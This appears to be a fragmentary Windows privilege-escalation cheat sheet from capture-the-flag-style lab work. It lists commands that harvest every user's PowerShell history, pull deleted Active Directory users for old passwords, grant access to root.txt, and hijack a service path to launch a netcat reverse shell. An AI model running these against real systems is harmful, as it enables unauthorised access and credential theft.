https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Windows - Privilege Escalation.md
icacls root.txt /grant alfred:F
powershell -c "tnc 10.10.14.33 -Port 135” (ping)
where /R c:\ bash.exe
dir /q /a /s
‣.exe
Config-based privesc checks
https://github.com/GhostPack/SharpUp.exe
Patch-level / missing KB exploits
dir -force #always
whoami /all
for %i in (Documents Downloads Pictures Contacts Desktop Favorites) do @dir /s "C:\\Users\\%USERNAME%\\%i"
Check C:\\ & C:\\Program files & Public as well
Import-Module PSReadLine
gc (Get-PSReadLineOption).HistorySavePath; type $Env:UserProfile\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt; foreach($user in ((ls C:\\users).fullname)){cat "$user\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
# Enumerate PSReadLine history across all profiles (silently skip missing)
foreach($user in ((ls C:\\users).fullname)){cat "$user\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadline\\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}
#checking deleted users for cascadelegacypwd
Import-Module ActiveDirectory
Get-ADObject -Filter 'isDeleted -eq $true -and objectClass -eq "user"' `
-IncludeDeletedObjects -Properties * |
Format-List *
netstat -ano | findstr “TCP”
ipconfig
arp -a
if u can edit a service binary path ( sc qc [service]) (sc config [service] nc ip port) (sc stop [serv]) (sc start [serv])